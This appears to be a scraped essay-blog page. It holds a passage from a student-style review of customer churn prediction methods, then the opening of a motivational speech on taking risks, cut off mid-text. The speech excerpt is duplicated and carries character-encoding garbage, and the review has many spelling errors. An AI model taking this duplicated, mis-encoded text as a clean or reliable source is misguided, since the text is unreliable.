application. The proportional hazard regression model is a commonly used survival analysis technique which was first proposed by Cox in 1972. CRITICAL REVIEW Jiayin and Yuanquan [1] proposed a very simple method for the variable selection. The method proposed is very effective and practical, But there are more systematic methods available, which use advance neural network, induction algorithms and rough set. Huangs and Kechadis [11] concept for taking into account the categorical values into account when feature selection is being performed, is good. But their concept is limited to categorical values and continues values cant be applied on their approach. Continues values need to be discretized into categorical values, before their feature selection concept could be applied, but this conversion from continues to discrete may result in loss of information. Luo, Shoa and Lie [2] selected Decision Tree as their choice of data mining algorithm for churn prediction, which is the simplest and understandable algorithm for classification. Its simplicity also makes it the most widely used algorithm. But decision tree has its own limitations, they are very unstable and a very little change in the input variables, such as addition of newer ones, require rebuilding and re-training of complete decision tree. In addition, they should have also focused on how to enrich the input variables, by adding new derived variables that could enhance the efficiency of the model. Ming, Huili and Yuwei [4] Bayesian network model has advantages and some short comings. It has the ability to product best results even when the input datasets are incomplete. In addition, it has the ability to take connections into account when predicting churn and to take prior knowledge into consideration. This algorithm also has the ability to effectively prevent over fitting. But if the dataset is large, the structure learning of the Bayesian networks will be too difficult. Thus this model is not fit for telecom, where the dataset is always very large. Jiayin, Yangming, Yingying and Shuang [10] TreeLogit combines the advantages of both algorithms i.e. ADTree and logistic regression, thus it is both data-driven and assumption-driven and it has the capability of analyzing objects with incomplete information. Moreover, its efficiency is not affected by the bad quality data and it generates continues output with relatively low complexity. Jing and Xinghua [5] used Support Vector Machine algorithm for Churn Prediction. This algorithm is best if you have a limited number of sample records, but on the other hand its theory is very complex and there are many variations in it. So it is difficult to find the version which best suites your problem. Conclusion There are multiple solutions available for customer churn prediction. Each has its own advantages and disadvantages. So a single solution might not be best for any organization. The organization may have to use the combination of algorithms and techniques to get the best results for churn prediction.
Saturday, July 20, 2019
Speech: Take Risks and Live Life to its Fullest -- essays research pap
Speech: Take Risks and Live Life to its Fullest Good morning ladies and gentlemen, today I am here to talk to you about a quote that Punch Imlach once said, he said that â€Å"a ship in harbour is safe, but that is not what ships are built for.†I think he is trying to say that one should not live their life in fear and that humans in general need to take more risks. Fear comes in many forms, there is fear of embarrassment, failure, and injury. These are the three main fears that keep people from achieving their dreams. I say go for it, if you want to do something don’t let fear get in your way. Follow your dreams, make them come true. If you spend your life living in fear, you won’t accomplish anything, because to achieve your highest goals you must take risks. For example there are some ... Speech: Take Risks and Live Life to its Fullest -- essays research pap Speech: Take Risks and Live Life to its Fullest Good morning ladies and gentlemen, today I am here to talk to you about a quote that Punch Imlach once said, he said that â€Å"a ship in harbour is safe, but that is not what ships are built for.†I think he is trying to say that one should not live their life in fear and that humans in general need to take more risks. Fear comes in many forms, there is fear of embarrassment, failure, and injury. These are the three main fears that keep people from achieving their dreams. I say go for it, if you want to do something don’t let fear get in your way. Follow your dreams, make them come true. If you spend your life living in fear, you won’t accomplish anything, because to achieve your highest goals you must take risks. For example there are some ...
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